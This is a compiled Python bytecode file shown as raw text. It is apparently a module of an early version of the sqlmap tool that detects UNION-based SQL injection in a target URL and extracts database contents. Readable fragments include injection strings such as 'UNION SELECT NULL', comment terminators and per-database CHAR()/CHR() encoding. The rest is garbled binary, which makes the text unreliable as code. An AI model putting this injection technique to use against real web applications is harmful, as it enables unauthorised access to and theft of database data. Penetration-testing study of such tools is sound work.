³ò ‰ŸFc@sdddkZddkZddkZddklZdefd„ƒYZdefd„ƒYZdS(iÿÿÿÿN(tCommont UnionCheckcBs)eZdZd„Zd„Zd„ZRS(s– This class defines methods to check if the target url is affected by an inband SQL injection vulnerability @author: Bernardo Damele cCs||_tidƒ|_dS(Nt sqlmapLog(targstloggingt getLoggertlogger(tselfR((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyt__init__s c Cs¶h}x©tdƒD]›}|o|d7}n|iidjo|}|o||7}qÔnu|iidjo'd|}|o|d|7}qÔn;|iidjo'|d}|o|d |7}qÔn|id |ƒ}|i|ƒ}||iƒjod |f||}|i||ƒ}|o|o||i_n|Sq@q@WdS( s– This method checks if the target url is affected by an inband SQL injection vulnerability. The test is done up to 3*50 times s"testing UNION SELECT statement on sparameter '%s's UNION SELECT NULLR s--t#(R s--R*N(Rt injParameterRtinfot injectionStmt _UnionCheck__effectiveUnionCheckt unionCommentR(RtlogMsgRR R&((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyt unionCheckZs (t__name__t __module__t__doc__RR.R1(((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyR s  BtUnionUsecBs2eZdZd„Zd„Zd„Zd„ZRS(sÙ This class defines methods to use the inband SQL injection vulnerability of an affected target to extract data from the database rather thand through blind SQL injection @author: Bernardo Damele cCs||_tidƒ|_dS(NR(RRRR(RR((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyR{s cCs d}d|iijoCd}x"|D]}|dt|ƒ7}q&W|d }|d7}n­d|iijoCd}x"|D]}|d t|ƒ7}q|W|d }|d7}nWd |iijoCd}x"|D]}|d t|ƒ7}qÒW|d }|d7}n|S( s This method is used to encode the request with the specific remote database management system syntax to avoid issues due to conversion of query output data type R tMySQLsCHAR(s%d,iÿÿÿÿt)t PostgreSQLt(s CHR(%d)||iþÿÿÿsMicrosoft SQL Servers CHAR(%d)+(Rt fingerprinttord(RR&tdbEncodedValuetchar((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyt__dbEncodeValue€s.   cCs4|idƒ}x^t|iiƒD]J}|djo|d7}n||jo|d|7}q"|d7}q"W|iidjo!|iio||ii7}n|iidjo3|d}|iio|d |ii7}q0nG|iid jo3|d }|iio|d |ii7}q0n|S( se This method effectively perform an inband SQL injection on the affected url s UNION SELECT is, s%sRR R s, '1s'%s 'R s, "1s"%s"(R-RRRRR/(Rt expressiont exprPositionRR%((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyt__effectiveUnionUse¥s&       cCsd}tiƒ}|i|ƒ}d}|d7}|d7}|iiput|iƒ}|iƒ}|o2|idƒ}||}|idƒ|i_q½|ii |ƒ|i |ƒSn|iip!|ii |ƒ|i |ƒSnx÷t |iiƒD]ã} t t iddƒƒ} d t t iddƒƒ} x¦| | fD]˜} |i| ƒ} t| ƒt|ƒjo+|it| ƒƒ}|id d ƒ}nEt| ƒt|ƒjo+| it|ƒƒ} | id d ƒ} n|i| | ƒ}|id |ƒ}|i|ƒ}|d 7}| iddƒ}||joŸd|jo’|i|ƒ}|t|ƒ}|||d!}|i|| ƒ}|id |ƒ}|i|ƒ}d|joqEny||}|i|ƒ}Wn qEnX|d 7}ttiƒ|ƒ}d|}|ii|ƒd}|d7}|ii|ƒd||f}|ii|ƒt || ƒ}|iioR|iiid|ii||iddƒiddƒfƒ|iiiƒn|SqEqEWqþW|ii |ƒ|i |ƒS(s÷ This method checks for an inband SQL injection on the target url using the UnionCheck.unionCheck() method, then call its subsidiary method to effectively perform an inband SQL injection on the affected url is,the target url is not affected by an inband s$SQL injection vulnerability or your sexpression is wrongtUNIONRi'iŸ†s'%s't0t R it'R tWarningi s request: %ss!the target url is affected by an s"inband SQL injection vulnerabilitys"performed %d queries in %d secondss %s][%s][%ss t __NEWLINE__s t__TAB__(ttimetunescapeRRRR1tindexRRtwarntgetValueRtstrtrandomtrandintt_UnionUse__dbEncodeValuetlentzfillRt_UnionUse__effectiveUnionUseRtgetPagetintR,t writeFiletwriteR'tflush(RR?RtstarttwarnMsgt unionObjectt checkUnionRKt splittedUrlR@t randIntegert randStringt randValueR<RR#t resultPagetrandValueReplacedt startPositiont endPositiont endCharacterst startPagetdurationR0R&((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pytunionUseÄs„               >(R2R3R4RRQRTRi(((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyR5rs   % (RRORIt lib.commonRRR5(((s3/usr/local/www/apache22/data/stuff/sql/lib/union.pyss   g